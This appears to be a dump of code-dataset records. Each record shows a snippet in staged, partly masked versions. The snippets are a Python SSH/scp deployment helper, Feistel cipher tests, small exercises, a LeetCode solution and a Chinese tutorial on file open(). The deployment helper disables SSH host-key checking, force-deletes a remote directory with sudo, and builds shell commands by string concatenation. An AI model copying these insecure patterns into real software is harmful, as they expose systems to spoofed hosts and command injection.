stdout\n =subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info('Compressing directory done [success]')\n else:\n logging.error('Compressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(['scp', '-pq', '-o', 'StrictHostKeyChecking=no',\n '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz', 'xnet@' +\n ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info('Transfer done [success]')\n else:\n logging.error('Transferring files failed [error]')\n logging.info('Detar file ...')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info('Decompressing directory done [success]')\n else:\n logging.error('Decompressing directory failed [error]')\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip, 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i',\n '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; ./script/install_config_machine.py'])\n return\n",
"step-5": "#!/usr/bin/env python3\n\nimport os\nimport subprocess\nimport logging\n\n\nclass color:\n PURPLE = '\\033[95m'\n CYAN = '\\033[96m'\n DARKCYAN = '\\033[36m'\n BLUE = '\\033[94m'\n GREEN = '\\033[92m'\n YELLOW = '\\033[93m'\n RED = '\\033[91m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n END = '\\033[0m'\n\n\n# Recover all ip for one component. Return format ip\ndef getHostsByKey(config, key):\n hosts = config.get(key, \"hosts\").split(',')\n index = 0\n for host in hosts:\n hosts[index] = host.strip(' \\n')\n index += 1\n return hosts\n\n\n# Function who return the ip of the current machine\ndef getIp():\n ip = os.popen('ifconfig ens3 | grep \"inet ad\" | cut -f2 -d: | awk \\'{print $1}\\'', \"r\").read()\n ip = ip.replace('\\n', '')\n return ip\n\n\n# Check if String il already present in the file\ndef isAlreadyAdd(pathFile, string):\n file = open(pathFile)\n for line in file:\n if string in line:\n return True\n return False\n\n\ndef deleteLineWithString(pathFile, stringResearch):\n contenu = \"\"\n fichier = open(pathFile, \"r\")\n for ligne in fichier:\n if not (stringResearch in ligne):\n contenu += ligne\n fichier.close()\n\n fichier = open('tmp.txt', 'w')\n fichier.write(contenu)\n fichier.close()\n os.system('sudo mv tmp.txt /etc/hosts >> /dev/null 2>&1')\n return\n\n\n# Function for check host\ndef hostIsUp(host):\n if os.system('ping -c 1 ' + host + ' >> /dev/null 2>&1'):\n return False\n return True\n\n\n# Function for recover ip by using server name\ndef getIpServerName(config, serverName):\n ip = \"\"\n value = serverName.split('-')\n if len(value) == 2:\n try:\n hosts = config.get(value[0], \"hosts\").split(',')\n ip = hosts[int(value[1]) - 1].strip(' \\n')\n except:\n return ip\n return ip\n\n\n# Function for update file on specific server\ndef updateFileServer(config, serverName):\n ip = getIpServerName(config, serverName)\n out = subprocess.run(['tar', 'czf', '/tmp/SDTD-Mazerunner-Script.tar.gz', '.'],\n cwd=os.getcwd(),\n stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True)\n if out.returncode == 0:\n logging.info(\"Compressing directory done [success]\")\n else:\n logging.error(\"Compressing directory failed [error]\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'sudo rm -rf SDTD-Mazerunner/script/'])\n out = subprocess.run(\n ['scp', '-pq', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', '/tmp/SDTD-Mazerunner-Script.tar.gz',\n 'xnet@' + ip + ':~/'], check=True)\n if out.returncode == 0:\n logging.info(\"Transfer done [success]\")\n else:\n logging.error(\"Transferring files failed [error]\")\n logging.info(\"Detar file ...\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'mkdir -p SDTD-Mazerunner/script'])\n out = subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'tar xzf SDTD-Mazerunner-Script.tar.gz -C SDTD-Mazerunner/script'])\n if out.returncode == 0:\n logging.info(\"Decompressing directory done [success]\")\n else:\n logging.error(\"Decompressing directory failed [error]\")\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'rm SDTD-Mazerunner-Script.tar.gz'])\n return\n\n\n# Function for install basic environment\ndef installEnvironmentServer(config, serverName):\n ip = getIpServerName(config, serverName)\n\n subprocess.run(['ssh', '-o', 'StrictHostKeyChecking=no', '-i', '~/.ssh/xnet', 'xnet@' + ip,\n 'source ~/.profile; 
./script/install_config_machine.py'])\n return\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
from MyFeistel import MyFeistel, LengthPreservingCipher
import pytest
import base64
import os
class TestMyFeistel:
def test_Functionality(self):
key = base64.urlsafe_b64encode(os.urandom(16))
feistel = MyFeistel(key, 10)
# decrypt(encrypt(msg)) == msg
for i in xrange(20):
msg = os.urandom(6)
assert feistel.decrypt(feistel.encrypt(msg)) == msg
def test_OddLengthMessage(self):
pass
class TestLengthPreservingCipher:
def test_Functionality(self):
key = base64.urlsafe_b64encode(os.urandom(16))
lpc = LengthPreservingCipher(key, 10)
# decrypt(encrypt(msg)) == msg
for i in xrange(20):
msg = os.urandom(6)
assert lpc.decrypt(lpc.encrypt(msg)) == msg
|
normal
|
{
"blob_id": "2464da1c4d2ddab3a053f0a14e3cc9a8beabe031",
"index": 6031,
"step-1": "<mask token>\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-2": "<mask token>\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n <mask token>\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-3": "<mask token>\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n\n def test_OddLengthMessage(self):\n pass\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-4": "from MyFeistel import MyFeistel, LengthPreservingCipher\nimport pytest\nimport base64\nimport os\n\n\nclass TestMyFeistel:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n\n def test_OddLengthMessage(self):\n pass\n\n\nclass TestLengthPreservingCipher:\n\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n",
"step-5": "from MyFeistel import MyFeistel, LengthPreservingCipher\nimport pytest\nimport base64\nimport os\n\nclass TestMyFeistel:\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n feistel = MyFeistel(key, 10)\n\n # decrypt(encrypt(msg)) == msg\n for i in xrange(20):\n msg = os.urandom(6)\n assert feistel.decrypt(feistel.encrypt(msg)) == msg\n def test_OddLengthMessage(self):\n pass\n\n\n\nclass TestLengthPreservingCipher:\n def test_Functionality(self):\n key = base64.urlsafe_b64encode(os.urandom(16))\n lpc = LengthPreservingCipher(key, 10)\n\n # decrypt(encrypt(msg)) == msg\n for i in xrange(20):\n msg = os.urandom(6)\n assert lpc.decrypt(lpc.encrypt(msg)) == msg\n\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
num = int(input())
odd_sum = 0
even_sum = 0
odd_smallest = sys.maxsize
even_smallest = sys.maxsize
odd_biggest = -sys.maxsize
even_biggest = -sys.maxsize
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
<|reserved_special_token_1|>
import sys
num = int(input())
odd_sum = 0
even_sum = 0
odd_smallest = sys.maxsize
even_smallest = sys.maxsize
odd_biggest = -sys.maxsize
even_biggest = -sys.maxsize
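# Positions are 1-based here: 0-based index i with i % 2 != 0 is the
# (i + 1)-th input, i.e. an even position, and feeds the even_* trackers.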
for i in range(0, num):
element = float(input())
if i % 2 != 0:
even_sum += element
if element <= even_smallest:
even_smallest = element
if element > even_biggest:
even_biggest = element
else:
odd_sum += element
if element <= odd_smallest:
odd_smallest = element
if element > odd_biggest:
odd_biggest = element
if num == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
elif odd_sum == 0:
print(f'OddSum=0.00,')
print(f'OddMin=No,')
print(f'OddMax=No,')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
elif even_sum == 0:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum=0.00,')
print(f'EvenMin=No,')
print(f'EvenMax=No')
else:
print(f'OddSum={odd_sum:.2f},')
print(f'OddMin={odd_smallest:.2f},')
print(f'OddMax={odd_biggest:.2f},')
print(f'EvenSum={even_sum:.2f},')
print(f'EvenMin={even_smallest:.2f},')
print(f'EvenMax={even_biggest:.2f}')
|
flexible
|
{
"blob_id": "69e8601a387d0987fbb6d1da5ac0f9412fffc63d",
"index": 8768,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-3": "<mask token>\nnum = int(input())\nodd_sum = 0\neven_sum = 0\nodd_smallest = sys.maxsize\neven_smallest = sys.maxsize\nodd_biggest = -sys.maxsize\neven_biggest = -sys.maxsize\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-4": "import sys\nnum = int(input())\nodd_sum = 0\neven_sum = 0\nodd_smallest = sys.maxsize\neven_smallest = sys.maxsize\nodd_biggest = -sys.maxsize\neven_biggest = -sys.maxsize\nfor i in range(0, num):\n element = float(input())\n if i % 2 != 0:\n even_sum += element\n if element <= even_smallest:\n even_smallest = element\n if element > even_biggest:\n even_biggest = element\n else:\n odd_sum += element\n if element <= odd_smallest:\n odd_smallest = element\n if element > odd_biggest:\n odd_biggest = element\nif num == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelif odd_sum == 0:\n print(f'OddSum=0.00,')\n print(f'OddMin=No,')\n print(f'OddMax=No,')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\nelif even_sum == 0:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum=0.00,')\n print(f'EvenMin=No,')\n print(f'EvenMax=No')\nelse:\n print(f'OddSum={odd_sum:.2f},')\n print(f'OddMin={odd_smallest:.2f},')\n print(f'OddMax={odd_biggest:.2f},')\n print(f'EvenSum={even_sum:.2f},')\n print(f'EvenMin={even_smallest:.2f},')\n print(f'EvenMax={even_biggest:.2f}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# @lc app=leetcode id=1121 lang=python3
#
# [1121] Divide Array Into Increasing Sequences
#
# https://leetcode.com/problems/divide-array-into-increasing-sequences/description/
#
# algorithms
# Hard (53.30%)
# Likes: 32
# Dislikes: 11
# Total Accepted: 1.7K
# Total Submissions: 3.2K
# Testcase Example: '[1,2,2,3,3,4,4]\n3'
#
# Given a non-decreasing array of positive integers nums and an integer K, find
# out if this array can be divided into one or more disjoint increasing
# subsequences of length at least K.
#
#
#
# Example 1:
#
#
# Input: nums = [1,2,2,3,3,4,4], K = 3
# Output: true
# Explanation:
# The array can be divided into the two subsequences [1,2,3,4] and [2,3,4] with
# lengths at least 3 each.
#
#
# Example 2:
#
#
# Input: nums = [5,6,6,7,8], K = 3
# Output: false
# Explanation:
# There is no way to divide the array using the conditions required.
#
#
#
#
# Note:
#
#
# 1 <= nums.length <= 10^5
# 1 <= K <= nums.length
# 1 <= nums[i] <= 10^5
#
#
#
# @lc code=start
from typing import List
from collections import Counter
class Solution:
def canDivideIntoSubsequences(self, nums: List[int], K: int) -> bool:
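        # The most frequent value must be spread over that many disjoint
        # increasing subsequences, each of length at least K, so the array
        # needs at least K * max_frequency elements in total.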
return len(nums) >= K * max(Counter(nums).values())
# cur, groups = 1, 1
# for i in range(1, len(nums)):
# if nums[i] > nums[i - 1]:
# cur = 1
# else:
# cur += 1
# groups = max(groups, cur)
# return len(nums) >= K * groups
# @lc code=end
|
normal
|
{
"blob_id": "6b55a9061bb118558e9077c77e18cfc81f3fa034",
"index": 1092,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def canDivideIntoSubsequences(self, nums: List[int], K: int) ->bool:\n return len(nums) >= K * max(Counter(nums).values())\n",
"step-4": "from collections import Counter\n\n\nclass Solution:\n\n def canDivideIntoSubsequences(self, nums: List[int], K: int) ->bool:\n return len(nums) >= K * max(Counter(nums).values())\n",
"step-5": "#\n# @lc app=leetcode id=1121 lang=python3\n#\n# [1121] Divide Array Into Increasing Sequences\n#\n# https://leetcode.com/problems/divide-array-into-increasing-sequences/description/\n#\n# algorithms\n# Hard (53.30%)\n# Likes: 32\n# Dislikes: 11\n# Total Accepted: 1.7K\n# Total Submissions: 3.2K\n# Testcase Example: '[1,2,2,3,3,4,4]\\n3'\n#\n# Given a non-decreasing array of positive integers nums and an integer K, find\n# out if this array can be divided into one or more disjoint increasing\n# subsequences of length at least K.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: nums = [1,2,2,3,3,4,4], K = 3\n# Output: true\n# Explanation: \n# The array can be divided into the two subsequences [1,2,3,4] and [2,3,4] with\n# lengths at least 3 each.\n# \n# \n# Example 2:\n# \n# \n# Input: nums = [5,6,6,7,8], K = 3\n# Output: false\n# Explanation: \n# There is no way to divide the array using the conditions required.\n# \n# \n# \n# \n# Note:\n# \n# \n# 1 <= nums.length <= 10^5\n# 1 <= K <= nums.length\n# 1 <= nums[i] <= 10^5\n# \n# \n#\n\n# @lc code=start\nfrom collections import Counter\n\nclass Solution:\n def canDivideIntoSubsequences(self, nums: List[int], K: int) -> bool:\n\n return len(nums) >= K * max(Counter(nums).values())\n\n # cur, groups = 1, 1\n # for i in range(1, len(nums)):\n # if nums[i] > nums[i - 1]:\n # cur = 1\n # else:\n # cur += 1\n # groups = max(groups, cur)\n # return len(nums) >= K * groups\n \n# @lc code=end\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Solution:
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import itertools


class Solution:
def countLetters(self, S: str) ->int:
ans = 0
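        # Each maximal run of cnt equal letters contributes
        # cnt * (cnt + 1) // 2 substrings made of a single repeated character.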
for _, g in itertools.groupby(S):
cnt = len(list(g))
ans += (1 + cnt) * cnt // 2
return ans
|
flexible
|
{
"blob_id": "f9cee552dde5ecf229fda559122b4b0e780c3b88",
"index": 7350,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n",
"step-3": "class Solution:\n\n def countLetters(self, S: str) ->int:\n ans = 0\n for _, g in itertools.groupby(S):\n cnt = len(list(g))\n ans += (1 + cnt) * cnt // 2\n return ans\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
class String:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class String:
def reverse(self, s):
return s[::-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class String:
def reverse(self, s):
return s[::-1]
<|reserved_special_token_0|>
print(obj1.reverse(s))
<|reserved_special_token_1|>
class String:
def reverse(self, s):
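        # Slicing with step -1 walks the string backwards, yielding its reverse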
return s[::-1]
s = input()
obj1 = String()
print(obj1.reverse(s))
|
flexible
|
{
"blob_id": "c27c29a5b4be9f710e4036f7f73a89c7d20acea5",
"index": 4317,
"step-1": "class String:\n <mask token>\n\n\n<mask token>\n",
"step-2": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\n<mask token>\n",
"step-3": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\n<mask token>\nprint(obj1.reverse(s))\n",
"step-4": "class String:\n\n def reverse(self, s):\n return s[::-1]\n\n\ns = input()\nobj1 = String()\nprint(obj1.reverse(s))\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(f.read())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
f = open('1.txt', 'r', encoding='utf-8')
print(f.read())
<|reserved_special_token_0|>
<|reserved_special_token_1|>
'''
The Python open() function is used to open a file and create a file object; only through that object's methods can the file be read and written.
For more file operations, see Python File I/O.
Function syntax
open(name[, mode[, buffering]])
Parameter description:
name : a string value containing the name of the file you want to access.
mode : mode determines how the file is opened: read-only, write, append, and so on. All possible values are given in the complete list below. This parameter is optional; the default file access mode is read-only (r).
buffering : if buffering is set to 0, no buffering occurs. If buffering is 1, lines are buffered when the file is accessed. If buffering is set to an integer greater than 1, that integer is the size of the buffer. If it is negative, the buffer size is the system default.
Complete list of modes for opening a file:
Mode
Description
r
Opens a file for reading only. The file pointer is placed at the beginning of the file. This is the default mode.
rb
Opens a file in binary format for reading only. The file pointer is placed at the beginning of the file. This is the default mode.
r+
Opens a file for both reading and writing. The file pointer is placed at the beginning of the file.
rb+
Opens a file in binary format for both reading and writing. The file pointer is placed at the beginning of the file.
w
Opens a file for writing only. If the file exists, it is opened and edited from the beginning, i.e. its original content is deleted. If the file does not exist, a new file is created.
wb
Opens a file in binary format for writing only. If the file exists, it is opened and edited from the beginning, i.e. its original content is deleted. If the file does not exist, a new file is created.
w+
Opens a file for both reading and writing. If the file exists, it is opened and edited from the beginning, i.e. its original content is deleted. If the file does not exist, a new file is created.
wb+
Opens a file in binary format for both reading and writing. If the file exists, it is opened and edited from the beginning, i.e. its original content is deleted. If the file does not exist, a new file is created.
a
Opens a file for appending. If the file exists, the file pointer is placed at the end of the file, so new content is written after the existing content. If the file does not exist, a new file is created for writing.
ab
Opens a file in binary format for appending. If the file exists, the file pointer is placed at the end of the file, so new content is written after the existing content. If the file does not exist, a new file is created for writing.
a+
Opens a file for both reading and writing. If the file exists, the file pointer is placed at the end of the file; the file opens in append mode. If the file does not exist, a new file is created for reading and writing.
ab+
Opens a file in binary format for appending. If the file exists, the file pointer is placed at the end of the file. If the file does not exist, a new file is created for reading and writing.
file object methods
file.read([size]): if size is omitted, returns the whole file; a file larger than twice the available memory is a problem. f.read() returns "" (an empty string) when the end of the file is reached.
file.readline(): returns one line.
file.readlines([size]) : returns a list containing size lines; if size is omitted, all lines are returned.
for line in f: print line : access the file through an iterator.
f.write("hello\n"): to write data other than a string, convert it to a string first.
f.tell(): returns an integer indicating the current position of the file pointer (the number of bytes from the start of the file).
f.seek(offset, [whence]): used to move the file pointer.
offset: in bytes; may be positive or negative
whence: 0 - start of file (default); 1 - current position; 2 - end of file
f.close() closes the file
open(filename [, mode [, bufsize]])
Opens a file and returns a file object. If the file cannot be opened, an IOError is raised.
open() should be used instead of directly calling the file type's constructor.
The parameter filename is the path string of the file to be opened;
the parameter mode is the opening mode; the most commonly used modes are 'r' to read text, 'w' to write a text file, and 'a' to append to a file.
The default value of mode is 'r'.
When operating on a binary file, simply add 'b' to the mode value. This improves the program's portability.
The optional parameter bufsize defines the size of the file buffer. 0 means unbuffered; 1 means line buffering; any other positive number means a buffer of that size;
a negative number means the system default buffer size, which for tty devices is usually line buffering and for other files full buffering. If the parameter value is omitted,
the system default is used.
'''
f=open('1.txt','r',encoding='utf-8')
print(f.read())
'''
Output...
ltf
zhongguo
shanxi
yuncheng
男
20
'''
# Reference blog: https://www.cnblogs.com/Devilf/p/8006663.html
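
# A minimal illustrative sketch (an addition, not from the referenced blog) of the
# tell()/seek() methods documented above, assuming f from above is still open:
# f.seek(0)        # move the file pointer back to the start (whence defaults to 0)
# print(f.tell())  # -> 0: the pointer is at the beginning again
# f.close()        # release the file handle when done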
|
flexible
|
{
"blob_id": "3a65565af4c55fa5479e323a737c48f7f2fdb8ce",
"index": 596,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(f.read())\n<mask token>\n",
"step-3": "<mask token>\nf = open('1.txt', 'r', encoding='utf-8')\nprint(f.read())\n<mask token>\n",
"step-4": "'''\npython open() 函数用于打开一个文件,创建一个 file 对象,相关的方法才可以调用它进行读写。\n更多文件操作可参考:Python 文件I/O。\n函数语法\nopen(name[, mode[, buffering]])\n参数说明:\nname : 一个包含了你要访问的文件名称的字符串值。\nmode : mode 决定了打开文件的模式:只读,写入,追加等。所有可取值见如下的完全列表。这个参数是非强制的,默认文件访问模式为只读(r)。\nbuffering : 如果 buffering 的值被设为 0,就不会有寄存。如果 buffering 的值取 1,访问文件时会寄存行。如果将 buffering 的值设为大于 1 的整数,表明了这就是的寄存区的缓冲大小。如果取负值,寄存区的缓冲大小则为系统默认。\n不同模式打开文件的完全列表:\n模式\n描述\nr\n以只读方式打开文件。文件的指针将会放在文件的开头。这是默认模式。\nrb\n以二进制格式打开一个文件用于只读。文件指针将会放在文件的开头。这是默认模式。\nr+\n打开一个文件用于读写。文件指针将会放在文件的开头。\nrb+\n以二进制格式打开一个文件用于读写。文件指针将会放在文件的开头。\nw\n打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nwb\n以二进制格式打开一个文件只用于写入。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nw+\n打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\nwb+\n以二进制格式打开一个文件用于读写。如果该文件已存在则打开文件,并从开头开始编辑,即原有内容会被删除。如果该文件不存在,创建新文件。\na\n打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。\nab\n以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。也就是说,新的内容将会被写入到已有内容之后。如果该文件不存在,创建新文件进行写入。\na+\n打开一个文件用于读写。如果该文件已存在,文件指针将会放在文件的结尾。文件打开时会是追加模式。如果该文件不存在,创建新文件用于读写。\nab+\n以二进制格式打开一个文件用于追加。如果该文件已存在,文件指针将会放在文件的结尾。如果该文件不存在,创建新文件用于读写。\nfile 对象方法\nfile.read([size]):size 未指定则返回整个文件,如果文件大小 >2 倍内存则有问题,f.read()读到文件尾时返回\"\"(空字串)。\nfile.readline():返回一行。\nfile.readlines([size]) :返回包含size行的列表, size 未指定则返回全部行。\nfor line in f: print line 